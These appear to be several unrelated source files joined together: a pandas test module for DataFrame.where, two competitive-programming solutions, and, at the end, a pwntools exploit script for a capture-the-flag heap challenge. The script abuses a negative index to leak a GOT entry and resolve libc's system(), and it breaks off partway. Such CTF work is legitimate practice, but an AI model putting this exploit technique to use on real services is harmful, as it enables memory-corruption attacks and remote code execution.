result = df.where(mask, **kwargs)
A = pd.Categorical([0, np.nan], categories=[0, 3])
B = pd.Categorical([np.nan, np.nan], categories=[1, 4])
C = pd.Categorical([np.nan, 5], categories=[2, 5])
expected = DataFrame({"A": A, "B": B, "C": C})
tm.assert_frame_equal(result, expected)
# Check Series.where while we're here
result = df.A.where(mask[:, 0], **kwargs)
expected = Series(A, name="A")
tm.assert_series_equal(result, expected)
def test_where_categorical_filtering(self):
# GH#22609 Verify filtering operations on DataFrames with categorical Series
df = DataFrame(data=[[0, 0], [1, 1]], columns=["a", "b"])
df["b"] = df["b"].astype("category")
result = df.where(df["a"] > 0)
# Explicitly cast to 'float' to avoid implicit cast when setting np.nan
expected = df.copy().astype({"a": "float"})
expected.loc[0, :] = np.nan
tm.assert_equal(result, expected)
def test_where_ea_other(self):
# GH#38729/GH#38742
df = DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
arr = pd.array([7, pd.NA, 9])
ser = Series(arr)
mask = np.ones(df.shape, dtype=bool)
mask[1, :] = False
# TODO: ideally we would get Int64 instead of object
result = df.where(mask, ser, axis=0)
expected = DataFrame({"A": [1, pd.NA, 3], "B": [4, pd.NA, 6]}).astype(object)
tm.assert_frame_equal(result, expected)
ser2 = Series(arr[:2], index=["A", "B"])
expected = DataFrame({"A": [1, 7, 3], "B": [4, pd.NA, 6]})
expected["B"] = expected["B"].astype(object)
msg = "Downcasting behavior in Series and DataFrame methods 'where'"
with tm.assert_produces_warning(FutureWarning, match=msg):
result = df.where(mask, ser2, axis=1)
tm.assert_frame_equal(result, expected)
def test_where_interval_noop(self):
# GH#44181
df = DataFrame([pd.Interval(0, 0)])
res = df.where(df.notna())
tm.assert_frame_equal(res, df)
ser = df[0]
res = ser.where(ser.notna())
tm.assert_series_equal(res, ser)
def test_where_interval_fullop_downcast(self, frame_or_series):
# GH#45768
obj = frame_or_series([pd.Interval(0, 0)] * 2)
other = frame_or_series([1.0, 2.0])
msg = "Downcasting behavior in Series and DataFrame methods 'where'"
with tm.assert_produces_warning(FutureWarning, match=msg):
res = obj.where(~obj.notna(), other)
# since all entries are being changed, we will downcast result
# from object to ints (not floats)
tm.assert_equal(res, other.astype(np.int64))
# unlike where, Block.putmask does not downcast
with tm.assert_produces_warning(
FutureWarning, match="Setting an item of incompatible dtype"
):
obj.mask(obj.notna(), other, inplace=True)
tm.assert_equal(obj, other.astype(object))
@pytest.mark.parametrize(
"dtype",
[
"timedelta64[ns]",
"datetime64[ns]",
"datetime64[ns, Asia/Tokyo]",
"Period[D]",
],
)
def test_where_datetimelike_noop(self, dtype):
# GH#45135, analogue to GH#44181 for Period don't raise on no-op
# For td64/dt64/dt64tz we already don't raise, but also are
# checking that we don't unnecessarily upcast to object.
with tm.assert_produces_warning(FutureWarning, match="is deprecated"):
ser = Series(np.arange(3) * 10**9, dtype=np.int64).view(dtype)
df = ser.to_frame()
mask = np.array([False, False, False])
res = ser.where(~mask, "foo")
tm.assert_series_equal(res, ser)
mask2 = mask.reshape(-1, 1)
res2 = df.where(~mask2, "foo")
tm.assert_frame_equal(res2, df)
res3 = ser.mask(mask, "foo")
tm.assert_series_equal(res3, ser)
res4 = df.mask(mask2, "foo")
tm.assert_frame_equal(res4, df)
# opposite case where we are replacing *all* values -> we downcast
# from object dtype # GH#45768
msg = "Downcasting behavior in Series and DataFrame methods 'where'"
with tm.assert_produces_warning(FutureWarning, match=msg):
res5 = df.where(mask2, 4)
expected = DataFrame(4, index=df.index, columns=df.columns)
tm.assert_frame_equal(res5, expected)
# unlike where, Block.putmask does not downcast
with tm.assert_produces_warning(
FutureWarning, match="Setting an item of incompatible dtype"
):
df.mask(~mask2, 4, inplace=True)
tm.assert_frame_equal(df, expected.astype(object))
def test_where_int_downcasting_deprecated():
# GH#44597
arr = np.arange(6).astype(np.int16).reshape(3, 2)
df = DataFrame(arr)
mask = np.zeros(arr.shape, dtype=bool)
mask[:, 0] = True
res = df.where(mask, 2**17)
expected = DataFrame({0: arr[:, 0], 1: np.array([2**17] * 3, dtype=np.int32)})
tm.assert_frame_equal(res, expected)
def test_where_copies_with_noop(frame_or_series):
# GH-39595
result = frame_or_series([1, 2, 3, 4])
expected = result.copy()
col = result[0] if frame_or_series is DataFrame else result
where_res = result.where(col < 5)
where_res *= 2
tm.assert_equal(result, expected)
where_res = result.where(col > 5, [1, 2, 3, 4])
where_res *= 2
tm.assert_equal(result, expected)
def test_where_string_dtype(frame_or_series):
# GH40824
obj = frame_or_series(
["a", "b", "c", "d"], index=["id1", "id2", "id3", "id4"], dtype=StringDtype()
)
filtered_obj = frame_or_series(
["b", "c"], index=["id2", "id3"], dtype=StringDtype()
)
filter_ser = Series([False, True, True, False])
result = obj.where(filter_ser, filtered_obj)
expected = frame_or_series(
[pd.NA, "b", "c", pd.NA],
index=["id1", "id2", "id3", "id4"],
dtype=StringDtype(),
)
tm.assert_equal(result, expected)
result = obj.mask(~filter_ser, filtered_obj)
tm.assert_equal(result, expected)
obj.mask(~filter_ser, filtered_obj, inplace=True)
tm.assert_equal(result, expected)
def test_where_bool_comparison():
# GH 10336
df_mask = DataFrame(
{"AAA": [True] * 4, "BBB": [False] * 4, "CCC": [True, False, True, False]}
)
result = df_mask.where(df_mask == False) # noqa: E712
expected = DataFrame(
{
"AAA": np.array([np.nan] * 4, dtype=object),
"BBB": [False] * 4,
"CCC": [np.nan, False, np.nan, False],
}
)
tm.assert_frame_equal(result, expected)
def test_where_none_nan_coerce():
# GH 15613
expected = DataFrame(
{
"A": [Timestamp("20130101"), pd.NaT, Timestamp("20130103")],
"B": [1, 2, np.nan],
}
)
result = expected.where(expected.notnull(), None)
tm.assert_frame_equal(result, expected)
def test_where_duplicate_axes_mixed_dtypes():
# GH 25399, verify manually masking is not affected anymore by dtype of column for
# duplicate axes.
result = DataFrame(data=[[0, np.nan]], columns=Index(["A", "A"]))
index, columns = result.axes
mask = DataFrame(data=[[True, True]], columns=columns, index=index)
a = result.astype(object).where(mask)
b = result.astype("f8").where(mask)
c = result.T.where(mask.T).T
d = result.where(mask) # used to fail with "cannot reindex from a duplicate axis"
tm.assert_frame_equal(a.astype("f8"), b.astype("f8"))
tm.assert_frame_equal(b.astype("f8"), c.astype("f8"))
tm.assert_frame_equal(c.astype("f8"), d.astype("f8"))
def test_where_columns_casting():
# GH 42295
df = DataFrame({"a": [1.0, 2.0], "b": [3, np.nan]})
expected = df.copy()
result = df.where(pd.notnull(df), None)
# make sure dtypes don't change
tm.assert_frame_equal(expected, result)
@pytest.mark.parametrize("as_cat", [True, False])
def test_where_period_invalid_na(frame_or_series, as_cat, request):
# GH#44697
idx = pd.period_range("2016-01-01", periods=3, freq="D")
if as_cat:
idx = idx.astype("category")
obj = frame_or_series(idx)
# NA value that we should *not* cast to Period dtype
tdnat = pd.NaT.to_numpy("m8[ns]")
mask = np.array([True, True, False], ndmin=obj.ndim).T
if as_cat:
msg = (
r"Cannot setitem on a Categorical with a new category \(NaT\), "
"set the categories first"
)
else:
msg = "value should be a 'Period'"
if as_cat:
with pytest.raises(TypeError, match=msg):
obj.where(mask, tdnat)
with pytest.raises(TypeError, match=msg):
obj.mask(mask, tdnat)
with pytest.raises(TypeError, match=msg):
obj.mask(mask, tdnat, inplace=True)
else:
# With PeriodDtype, ser[i] = tdnat coerces instead of raising,
# so for consistency, ser[mask] = tdnat must as well
expected = obj.astype(object).where(mask, tdnat)
result = obj.where(mask, tdnat)
tm.assert_equal(result, expected)
expected = obj.astype(object).mask(mask, tdnat)
result = obj.mask(mask, tdnat)
tm.assert_equal(result, expected)
with tm.assert_produces_warning(
FutureWarning, match="Setting an item of incompatible dtype"
):
obj.mask(mask, tdnat, inplace=True)
tm.assert_equal(obj, expected)
def test_where_nullable_invalid_na(frame_or_series, any_numeric_ea_dtype):
# GH#44697
arr = pd.array([1, 2, 3], dtype=any_numeric_ea_dtype)
obj = frame_or_series(arr)
mask = np.array([True, True, False], ndmin=obj.ndim).T
msg = r"Invalid value '.*' for dtype (U?Int|Float)\d{1,2}"
for null in tm.NP_NAT_OBJECTS + [pd.NaT]:
# NaT is an NA value that we should *not* cast to pd.NA dtype
with pytest.raises(TypeError, match=msg):
obj.where(mask, null)
with pytest.raises(TypeError, match=msg):
obj.mask(mask, null)
@given(data=OPTIONAL_ONE_OF_ALL)
def test_where_inplace_casting(data):
# GH 22051
df = DataFrame({"a": data})
df_copy = df.where(pd.notnull(df), None).copy()
df.where(pd.notnull(df), None, inplace=True)
tm.assert_equal(df, df_copy)
def test_where_downcast_to_td64():
ser = Series([1, 2, 3])
mask = np.array([False, False, False])
td = pd.Timedelta(days=1)
msg = "Downcasting behavior in Series and DataFrame methods 'where'"
with tm.assert_produces_warning(FutureWarning, match=msg):
res = ser.where(mask, td)
expected = Series([td, td, td], dtype="m8[ns]")
tm.assert_series_equal(res, expected)
with pd.option_context("future.no_silent_downcasting", True):
with tm.assert_produces_warning(None, match=msg):
res2 = ser.where(mask, td)
expected2 = expected.astype(object)
tm.assert_series_equal(res2, expected2)
def _check_where_equivalences(df, mask, other, expected):
# similar to tests.series.indexing.test_setitem.SetitemCastingEquivalences
# but with DataFrame in mind and less fleshed-out
res = df.where(mask, other)
tm.assert_frame_equal(res, expected)
res = df.mask(~mask, other)
tm.assert_frame_equal(res, expected)
# Note: frame.mask(~mask, other, inplace=True) takes some more work bc
# Block.putmask does *not* downcast. The change to 'expected' here
# is specific to the cases in test_where_dt64_2d.
df = df.copy()
df.mask(~mask, other, inplace=True)
if not mask.all():
# with mask.all(), Block.putmask is a no-op, so does not downcast
expected = expected.copy()
expected["A"] = expected["A"].astype(object)
tm.assert_frame_equal(df, expected)
def test_where_dt64_2d():
dti = date_range("2016-01-01", periods=6)
dta = dti._data.reshape(3, 2)
other = dta - dta[0, 0]
df = DataFrame(dta, columns=["A", "B"])
mask = np.asarray(df.isna()).copy()
mask[:, 1] = True
# setting all of one column, none of the other
expected = DataFrame({"A": other[:, 0], "B": dta[:, 1]})
with tm.assert_produces_warning(
FutureWarning, match="Setting an item of incompatible dtype"
):
_check_where_equivalences(df, mask, other, expected)
# setting part of one column, none of the other
mask[1, 0] = True
expected = DataFrame(
{
"A": np.array([other[0, 0], dta[1, 0], other[2, 0]], dtype=object),
"B": dta[:, 1],
}
)
with tm.assert_produces_warning(
FutureWarning, match="Setting an item of incompatible dtype"
):
_check_where_equivalences(df, mask, other, expected)
# setting nothing in either column
mask[:] = True
expected = df
_check_where_equivalences(df, mask, other, expected)
def test_where_producing_ea_cond_for_np_dtype():
# GH#44014
df = DataFrame({"a": Series([1, pd.NA, 2], dtype="Int64"), "b": [1, 2, 3]})
result = df.where(lambda x: x.apply(lambda y: y > 1, axis=1))
expected = DataFrame(
{"a": Series([pd.NA, pd.NA, 2], dtype="Int64"), "b": [np.nan, 2, 3]}
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"replacement", [0.001, True, "snake", None, datetime(2022, 5, 4)]
)
def test_where_int_overflow(replacement):
# GH 31687
df = DataFrame([[1.0, 2e25, "nine"], [np.nan, 0.1, None]])
result = df.where(pd.notnull(df), replacement)
expected = DataFrame([[1.0, 2e25, "nine"], [replacement, 0.1, replacement]])
tm.assert_frame_equal(result, expected)
def test_where_inplace_no_other():
# GH#51685
df = DataFrame({"a": [1.0, 2.0], "b": ["x", "y"]})
cond = DataFrame({"a": [True, False], "b": [False, True]})
df.where(cond, inplace=True)
expected = DataFrame({"a": [1, np.nan], "b": [np.nan, "y"]})
tm.assert_frame_equal(df, expected)
| pandas-dev/pandas | pandas/tests/frame/indexing/test_where.py | test_where.py | py | 38,120 | python | en | code | 40,398 | github-code | 90 |
9405251113 | #!/bin/python3
import math
import os
import random
import re
import sys
# Complete the jumpingOnClouds function below.
def jumpingOnClouds(c):
count, step_now = 0, 0
done = False
while not done:
if step_now+2 > (len(c) - 1) and c[step_now+1] != 1:
count += 1
done = True
elif step_now+2 <= (len(c) - 1):
if (c[step_now+1] != 1 and c[step_now+2] != 1) or (c[step_now+1] == 1 and c[step_now+2] != 1):
step_now += 2
count += 1
elif (c[step_now+1] != 1 and c[step_now+2] == 1):
step_now += 1
count += 1
if step_now == (len(c) - 1):
done = True
return count
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
c = list(map(int, input().rstrip().split()))
result = jumpingOnClouds(c)
fptr.write(str(result) + '\n')
fptr.close()
| qwe12345113/HackerRank | Warm-up Challenges/Jumping on the Clouds.py | Jumping on the Clouds.py | py | 1,001 | python | en | code | 0 | github-code | 90 |
18446812019 | def count_section_by_zero(data):
count = 0
flg = False
start = 0
for i, d in enumerate(data):
if flg is False and d != 0:
count += 1
flg = True
if d == 0:
flg = False
return count
def input_list():
return list(map(int, input().split()))
def input_list_str():
return map(str, input().split())
def lcm_base(x, y):
return (x * y) // fractions.gcd(x, y)
def lcm_list(numbers):
return reduce(lcm_base, numbers, 1)
def gcd(*numbers):
return reduce(fractions.gcd, numbers)
def gcd_list(numbers):
return reduce(fractions.gcd, numbers)
# 2で割り切れる回数
def divide_two(arg):
c = 0
while True:
if c >= 2:
break
if arg % 2 != 0:
break
arg //= 2
c += 1
return c
# 素因数分解
def prime_factorize(n):
a = []
while n % 2 == 0:
a.append(2)
n //= 2
f = 3
while f * f <= n:
if n % f == 0:
a.append(f)
n //= f
else:
f += 2
if n != 1:
a.append(n)
return a
def main():
k, a, b = input_list()
ans = 1
lf = max(0, k - a+1)
lf1 = lf//2
if lf:
ans = a + lf1 * (b - a) + lf%2
else:
ans +k
print(max(ans, k+1))
import math
import fractions
import collections
from functools import reduce
main() | Aasthaengg/IBMdataset | Python_codes/p03131/s084085095.py | s084085095.py | py | 1,316 | python | en | code | 0 | github-code | 90 |
18275437499 | N = input()
K = int(input())
if len(N) < K:
print(0)
exit()
keta = []
for k in range(len(N)):
keta.append(int(N[-k-1]))
ans = [1, keta[0], 0, 0];
def combination(N,K):
if N < K:
return 0
else:
p = 1
for k in range(K):
p *= N
N -= 1
for k in range(1, K+1):
p //= k
return p
for k in range(1, len(N)-1):
if keta[k] > 0:
a = [1, 0, 0, 0]
for j in range(1, 4):
a[j] += (9**(j))*combination(k, j)
a[j] += (keta[k]-1)*combination(k, j-1)*(9**(j-1)) + ans[j-1]
ans = [] + a
answer = (9**(K))*combination(len(N)-1, K)
answer += (keta[-1]-1)*(9**(K-1))*combination(len(N)-1, K-1)
answer += ans[K-1]
print(answer) | Aasthaengg/IBMdataset | Python_codes/p02781/s740622120.py | s740622120.py | py | 680 | python | en | code | 0 | github-code | 90 |
17660697181 | import xml.dom.minidom
dom = xml.dom.minidom.parse('HPC发端模型.svg') #打开svg文档(这里将SVG和脚本放到一个目录)
root = dom.documentElement #得到文档元素对象
gList = root.getElementsByTagName('g') #得到所有g标签
pathList = root.getElementsByTagName('path') #得到所有path标签
rectList = root.getElementsByTagName('rect') #得到所有rect标签
textList = root.getElementsByTagName('text') #得到所有text标签
# 设置g
for index in range(len(gList)):
label = gList[index].getAttribute('inkscape:label')
if gList[index].hasAttribute('inkscape:label'):
# id = gList[index].getAttribute('id')
gList[index].setAttribute('id',label[1:])
# 设置path
for index in range(len(pathList)):
label = pathList[index].getAttribute('inkscape:label')
if pathList[index].hasAttribute('inkscape:label'):
# id = pathList[index].getAttribute('id')
pathList[index].setAttribute('id',label[1:])
# 设置rect
for index in range(len(rectList)):
label = rectList[index].getAttribute('inkscape:label')
if rectList[index].hasAttribute('inkscape:label'):
# id = rectList[index].getAttribute('id')
rectList[index].setAttribute('id',label[1:])
# 设置text
for index in range(len(textList)):
label = textList[index].getAttribute('inkscape:label')
if textList[index].hasAttribute('inkscape:label'):
# id = textList[index].getAttribute('id')
textList[index].setAttribute('id',label[1:])
'''
将文档进行重写,注意文档中内容含有中文的情况
open()函数默认是文本模式打开,也就是ANSII编码
在简体中文系统下,ANSII编码代表 GB2312 编码
'''
with open('HPC发端模型.svg', 'w', encoding='utf-8') as f:
# 缩进 - 换行 - 编码
dom.writexml(f, addindent='', encoding='utf-8') | Robert30-xl/SVG-setAttribute-for-Inkscape | setAttribute.py | setAttribute.py | py | 1,863 | python | zh | code | 1 | github-code | 90 |
11359692135 | #%%
import numpy as np
import matplotlib.pyplot as plt
import lorenz96 as l96
import json
#%%
json_file = open("parameter.json","r")
json_data = json.load(json_file)
N = np.int(json_data["N"]) # Number of variables
F = np.int(json_data["F"]) # Forcing
AW = np.float(json_data["AW"])
ADAY = np.float(json_data["ADAY"])
YEAR = np.int(json_data["YEAR"])
#%%
#時間発展の線形性を利用して近似的に求める
def jacobian(x):
d = 1e-4
Jacob = np.zeros((N, N))
xb = l96.short_run(x)
for i in range(N):
xe = np.zeros(N)
xe[:] = x[:]
xe[i] = x[i] + d
xa = l96.short_run(xe) #誤差あり
Jacob[:, i] = (xa[:] - xb[:]) / d
return Jacob
#%%
def read_data():
obs = np.fromfile("obs.bin",dtype=np.float32)
obs = obs.reshape(int(len(obs)/N), N)
print("##### Read Observation Data #####")
print("Observation Data shape : ",obs.shape)
control = np.fromfile("control.bin",dtype=np.float32)
control = control.reshape(int(len(control)/N), N)
print("##### Read Control Run Data #####")
print("Control Run Data shape : ",obs.shape)
true = np.fromfile("spinup.bin",dtype=np.float32)
true = true.reshape(int(len(true)/N), N)
print("##### Read True Value Data #####")
print("True Value Data shape : ",obs.shape)
return obs, control, true
obs, control, true = read_data()
#%%Kalman Filter
initial_Pa = np.identity(N) * 1e+1
#観測に欠損値はないので観測演算子は単位行列でOK
#%%
def kalman_filter(Xa, Pa, obs, delta=0.1, H=np.identity(N), R=np.identity(N)):
#予報
Xf = l96.short_run(Xa)
#カルマンゲインの計算
M = jacobian(Xa)
Pf = ( 1 + delta ) * M @ Pa @ M.T
K = Pf @ H.T @ np.linalg.inv(H @ Pf @ H.T +R)
#解析値の計算
Xa = Xf + K @ (obs - H @ Xf)
Pa = (np.identity(N) - K @ H) @ Pf
return Xa, Pa
#%%
def exec():
Pa0 = np.identity(N) + 1e+1
Xa0 = control[0,:]
pa = Pa0
xa = Xa0
Xa = []
Pa = []
for t in range(int((YEAR/2) * 365 * (24/AW))-1):
print("Time Step {}".format(t))
Xa.append(xa)
Pa.append(pa)
xa, pa= kalman_filter(xa, pa, obs[t+1, :])
Xa = np.array(Xa)
Pa = np.array(Pa)
print(" Fnish Calculate Xa : ", Xa.shape)
print(" Fnish Calculate Pa : ", Pa.shape)
return Xa, Pa
Xa, Pa = exec()
#%%
plt.title("X1")
plt.plot(control[0:200,0],label="Control")
plt.plot(Xa[0:200,0],label="Analysis")
plt.plot(true[0:200,0],label="True")
plt.plot(obs[0:200,0])
plt.xlabel("Step ( /6h)")
plt.legend()
#plt.plot(obs[:,0])
#%%
def calc_rmse(data1, data2):
RMSE = []
for i in range(len(data1[:,0])):
rmse = np.sqrt(np.mean((data1[i,:] - data2[i,:]) ** 2))
RMSE.append(rmse)
return RMSE
#%%
RMSE1 = calc_rmse(control, true)
RMSE2 = calc_rmse(Xa, true)
RMSE3 = calc_rmse(obs, true)
plt.title("RMSE (vs True)")
plt.plot(RMSE1, label="Control")
plt.plot(RMSE2, label="Anlysis")
plt.plot(RMSE3, label="Observation")
plt.xlabel("Step ( /6h )")
plt.legend()
plt.savefig("non_delta.png",tight_layout=True, dpi=500)
#%%
"""
if(__name__ == "__main__"):
start = time.time()
main()
elapsed = time.time() - start
print("Elapsed Time : ",elapsed)
"""
# %%
| sc2xos/Met | DA/kalman_filter.py | kalman_filter.py | py | 3,360 | python | en | code | 0 | github-code | 90 |
7108268342 | """ Created on 23/07/2022::
------------- test_all.py -------------
**Authors**: L. Mingarelli
"""
import numpy as np
from bindata.check_commonprob import check_commonprob
from bindata import (commonprob2sigma,
condprob,
bincorr2commonprob,
ra2ba,
rmvbin
)
from bindata.simul_commonprob import simul_commonprob
class Tests:
def test_check_commonprob(self):
flag, msg = check_commonprob([[0.5, 0.4],
[0.4, 0.8]])
assert flag
flag, msg = check_commonprob([[0.5, 0.25],
[0.25, 0.8]])
assert not flag
assert msg[0].startswith('Error in Element (0, 1): Admissible values are')
flag, msg = check_commonprob([[0.5, 0, 0],
[0, 0.5, 0],
[0, 0, 0.5]])
assert not flag
assert msg[0].startswith('The sum of the common probabilities of 0, 1, 2')
def test_bincorr2commonprob(self):
margprob = np.array([0.3, 0.9])
bincorr = np.eye(len(margprob))
commonprob = bincorr2commonprob(margprob, bincorr)
assert np.isclose(commonprob, np.array([[0.3 , 0.27],
[0.27, 0.9 ]])).all()
def test_commonprob2sigma(self):
m = [[1/2, 1/5, 1/6],
[1/5, 1/2, 1/6],
[1/6, 1/6, 1/2]]
Σ = commonprob2sigma(commonprob=m)
Σ2 = commonprob2sigma(commonprob=m, par=True)
assert (Σ == np.array([[ 1. , -0.3088814758080922, -0.500114775383386],
[-0.3088814758080922, 1. , -0.500114775383386],
[-0.500114775383386, -0.500114775383386, 1. ]])).all()
assert (Σ == Σ2).all()
def test_condprob(self):
x = np.array([[0,1], [1,1], [0,0], [0,0], [1,0], [1,1]])
expected_res = np.array([[1, 2/3],
[2/3, 1]])
assert np.isclose(condprob(x), expected_res).all()
np.random.seed(0)
x = np.random.binomial(1, 0.5, (1_000_000, 2))
expected_res = np.array([[1, 0.5013397165515436],
[ 0.5011774904572338, 1]])
assert np.isclose(condprob(x), expected_res).all()
def test_ra2ba(self):
np.random.seed(0)
x = np.random.normal(0,1, (2, 5))
expected_res = np.array([[ True, True, True, True, True],
[False, True, False, False, True]])
assert (ra2ba(x)==expected_res).all()
def test_rmvbin(self):
corr = np.array([[1., -0.25, -0.0625],
[-0.25, 1., 0.25],
[-0.0625, 0.250, 1.]])
commonprob = bincorr2commonprob(margprob=[0.2, 0.5, 0.8], bincorr=corr)
sample = rmvbin(margprob=np.diag(commonprob), commonprob=commonprob, N=10_000_000)
realised_corr = np.corrcoef(sample, rowvar=False)
np.abs(corr - realised_corr)
assert np.isclose(corr, realised_corr, rtol=1e-4, atol=2e-3).all()
def test_rmvbin2(self):
N = 10_000_000
# Uncorrelated columns:
margprob = [0.3, 0.9]
X = rmvbin(N=N, margprob=margprob)
assert np.isclose(X.mean(0), margprob, rtol=1e-4, atol=2e-3).all()
assert np.isclose(np.corrcoef(X, rowvar=False), np.eye(2), rtol=1e-4, atol=2e-3).all()
# Correlated columns
m = [[1/2, 1/5, 1/6],
[1/5, 1/2, 1/6],
[1/6, 1/6, 1/2]]
X = rmvbin(N=N, commonprob=m)
assert np.isclose(X.mean(0), np.diagonal(m), rtol=1e-4, atol=2e-3).all()
assert np.isclose(np.corrcoef(X, rowvar=False),
np.array([[ 1. , -0.19966241, -0.33318569],
[-0.19966241, 1. , -0.33377646],
[-0.33318569, -0.33377646, 1. ]]),
rtol=1e-4, atol=2e-3).all()
# Same as the example above, but faster if the same probabilities are
# used repeatedly
sigma = commonprob2sigma(m)
X = rmvbin(N=N, margprob=np.diagonal(m), sigma=sigma)
assert np.isclose(X.mean(0), np.diagonal(m), rtol=1e-4, atol=2e-3).all()
assert np.isclose(np.corrcoef(X, rowvar=False),
np.array([[ 1. , -0.19966241, -0.33318569],
[-0.19966241, 1. , -0.33377646],
[-0.33318569, -0.33377646, 1. ]]),
rtol=1e-4, atol=2e-3).all()
def test_rmvbin3(self):
N = 10_000
p_d = 0.1
corr = 0.1
a, b = rmvbin(N=N, margprob=[p_d, p_d],
bincorr=[[1, corr],
[corr, 1]]).T
def test_simul_commonprob(self):
margprob = np.arange(0, 1.5, 0.5)
corr = np.arange(-1, 1.5, 0.5)
np.random.seed(0)
Z = simul_commonprob(margprob=margprob,
corr=corr,
method="monte carlo", n1=10**4)
expected_Z = {(0.0, 0.0): np.array([[-1. , -0.5, 0. , 0.5, 1. ],
[ 0. , 0. , 0. , 0. , 0. ]]),
(0.0, 0.5): np.array([[-1. , -0.5, 0. , 0.5, 1. ],
[ 0. , 0. , 0. , 0. , 0. ]]),
(0.0, 1.0): np.array([[-1. , -0.5, 0. , 0.5, 1. ],
[ 0. , 0. , 0. , 0. , 0. ]]),
(0.5, 0.5): np.array([[-1. , -0.5 , 0. , 0.5 , 1. ],
[ 0. , 0.16769, 0.25 , 0.3354 , 0.5 ]]),
(0.5, 1.0): np.array([[-1. , -0.5, 0. , 0.5, 1. ],
[ 0.5, 0.5, 0.5, 0.5, 0.5]]),
(1.0, 1.0): np.array([[-1. , -0.5, 0. , 0.5, 1. ],
[ 1. , 1. , 1. , 1. , 1. ]])
}
for c, eZ in expected_Z.items():
assert np.isclose(Z[c], eZ).all().all()
| LucaMingarelli/bindata | bindata/tests/test_all.py | test_all.py | py | 6,329 | python | en | code | 2 | github-code | 90 |
2703654188 | from django.shortcuts import render
import numpy as np
import pandas as pd
# our home page view
def home(request):
return render(request, 'index.html')
# custom method for generating predictions
def getPredictions(age,preg,glu,bp,st,ins,bmi,dpf):
import pickle
n1 = pickle.load(open("C:\\Users\\Arshan\\Desktop\\diabetes\\Diabetes\\Diabetes\\Age_Encode.sav", "rb"))
age=n1.transform(np.array(age).reshape(1,-1))
n2 = pickle.load(open("C:\\Users\\Arshan\\Desktop\\diabetes\\Diabetes\\Diabetes\\Pregancies_Encode.sav", "rb"))
preg=n1.transform(np.array(preg).reshape(1,-1))
n3 = pickle.load(open("C:\\Users\\Arshan\\Desktop\\diabetes\\Diabetes\\Diabetes\\Glucose_Encode.sav", "rb"))
glu=n3.transform(np.array(glu).reshape(1,-1))
n4 = pickle.load(open("C:\\Users\\Arshan\\Desktop\\diabetes\\Diabetes\\Diabetes\\BP_Encode.sav", "rb"))
bp=n4.transform(np.array(bp).reshape(1,-1))
n5 = pickle.load(open("C:\\Users\\Arshan\\Desktop\\diabetes\\Diabetes\\Diabetes\\ST_Encode.sav", "rb"))
st=n5.transform(np.array(st).reshape(1,-1))
n6 = pickle.load(open("C:\\Users\\Arshan\\Desktop\\diabetes\\Diabetes\\Diabetes\\Insulin_Encode.sav", "rb"))
ins=n6.transform(np.array(ins).reshape(1,-1))
n7 = pickle.load(open("C:\\Users\\Arshan\\Desktop\\diabetes\\Diabetes\\Diabetes\\BMI_Encode.sav", "rb"))
bmi=n7.transform(np.array(bmi).reshape(1,-1))
n8 = pickle.load(open("C:\\Users\\Arshan\\Desktop\\diabetes\\Diabetes\\Diabetes\\DPF_Encode.sav", "rb"))
dpf=n8.transform(np.array(dpf).reshape(1,-1))
l1=[age,preg,glu,bp,st,ins,bmi,dpf]
l1=np.array(l1)
model=pickle.load(open("C:\\Users\\Arshan\\Desktop\\diabetes\\Diabetes\\Diabetes\\RandFmodel.pkl", "rb"))
l1=l1.reshape(1,-1)
prediction=model.predict(l1)
if prediction == 0:
return "Not Diabetic"
elif prediction == 1:
return "Diabetic"
else:
return "error"
# our result page view
def result(request):
age=int(request.GET['age'])
preg=int(request.GET['preg'])
glu=int(request.GET['glu'])
bp=int(request.GET['bp'])
st=int(request.GET['st'])
ins=int(request.GET['ins'])
bmi=float(request.GET['bmi'])
dpf=float(request.GET['dpf'])
result = getPredictions(age,preg,glu,bp,st,ins,bmi,dpf)
return render(request, 'index.html', {'result':result})
| Aliyan2002/Diabetes | Diabetes/views.py | views.py | py | 2,412 | python | en | code | 0 | github-code | 90 |
33673702277 | # https://leetcode-cn.com/problems/n-ary-tree-level-order-traversal/
# 思路:几乎与二叉树的层序优先遍历一模一样
from queue import Queue
from typing import List
class Node:
def __init__(self, val, children):
self.val = val
self.children = children
class Solution:
def levelOrder(self, root: 'Node') -> List[List[int]]:
"""
:type root: Node
:rtype: List[List[int]]
"""
ans = []
q = Queue()
q.put((root, 1))
while not q.empty():
node, lev = q.get()
if not node:
continue
if lev > len(ans):
ans.append([])
ans[-1].append(node.val)
for n in node.children:
q.put((n, lev + 1))
return ans
| algorithm003/algorithm | Week_03/id_40/leetcode_429_40.py | leetcode_429_40.py | py | 814 | python | en | code | 17 | github-code | 90 |
21029806430 | from pwn import *
import time
import sys
def easy_heap(DEBUG):
t = 0.3
def Add(index, name):
r.sendline("1")
r.recvuntil("Index: ")
r.sendline(str(index))
r.recvuntil("Input this name: ")
r.send(name)
time.sleep(t)
res = r.recvuntil("Your choice:")
return res
def View(idx):
r.sendline("4")
r.recvuntil("Index: ")
r.sendline(str(idx))
res = r.recvuntil("Done!")
r.recvuntil("Your choice:")
return res
def Delete(idx):
r.sendline("3")
r.recvuntil("Index: ")
r.sendline(str(idx))
res = r.recvuntil("Your choice:")
return res
def Edit(idx, name):
r.sendline("2")
r.recvuntil("Index: ")
r.sendline(str(idx))
r.recvuntil("Input new name: ")
r.send(name)
time.sleep(t)
res = r.recvuntil("Your choice:")
return res
def Exit():
r.sendline("5")
if DEBUG=="1":
t = 0.005
r = process("./easy_heap")
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
raw_input("debug?")
elif DEBUG=="2":
t = 0.01
env = {
'LD_PRELOAD': './easyheap_libc.so.6'
}
r = process("./easy_heap",env=env)
libc = ELF('./easyheap_libc.so.6')
raw_input("debug?")
elif DEBUG=="3":
offset_main_arena = 0x3c3af0
libc = ELF('./easyheap_libc.so.6')
HOST = 'easyheap.acebear.site'
PORT = 3002
r = remote(HOST,PORT)
free_got = 0x804B018
atoi_got = 0x0804B038
stdout = 0x0804B084
NAME = p32(atoi_got) # 0x0804B0E0
AGE = 0x40
r.recvuntil("Give me your name: ")
r.sendline(NAME)
r.recvuntil("Your age: ")
r.sendline(str(AGE))
r.recvuntil("Your choice: ")
idx = -2147483632 # idx < 9, DWORD PTR [idx*4+0x0804B0A0] == 0x0804B0E0 (NAME)
# leak atoi_got
res = View(idx)
atoi_got = u32(res.split(" is: ")[1][:4])
baselibc = atoi_got - libc.symbols['atoi']
system = baselibc + libc.symbols['system']
